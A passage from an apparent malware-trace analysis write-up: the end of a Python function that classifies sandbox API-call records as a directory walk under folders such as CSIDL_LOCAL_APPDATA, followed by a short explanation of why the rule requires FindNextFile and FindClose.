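    builds = [a for a in apis if a.startswith(("lstrcat", "wsprintf"))]
    first = [c for c in calls if c["api"].startswith("FindFirstFile")]
    has_next = any(a.startswith("FindNextFile") for a in apis)
    has_close = "FindClose" in apis
    # StrCmpC* calls in the same subcall as FindFirstFile: read here as the
    # usual "." / ".." skip of a recursive walker.  The compared constants are
    # not in the report, so this is an inference, not a decoded string.
    walker = first[0]["subcall"] if first else None
    skips = sum(1 for c in calls
                if c["api"].startswith("StrCmpC") and c["subcall"] == walker)
    # A lone FindFirstFile without FindNextFile is an existence check, not a walk.
    is_walk = bool(first) and has_next and has_close
    if is_walk and folders:
        verdict = "folder walk under " + ", ".join(folders)
    elif is_walk:
        verdict = "directory walk"
    else:
        verdict = "no match"
    return {
        "folders": folders,
        "path_build_calls": len(builds),
        "directory_walk": is_walk,
        "name_skip_compares": skips,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for key, value in classify(parse_trace(SAMPLE_TRACE)).items():
        print(f"{key}: {value}")
```

The rule deliberately requires FindNextFile and FindClose alongside FindFirstFile, so a single existence probe of one file does not fire it; on this record it reports a walk under CSIDL_LOCAL_APPDATA with five path-building calls and two name comparisons inside the walker subcall.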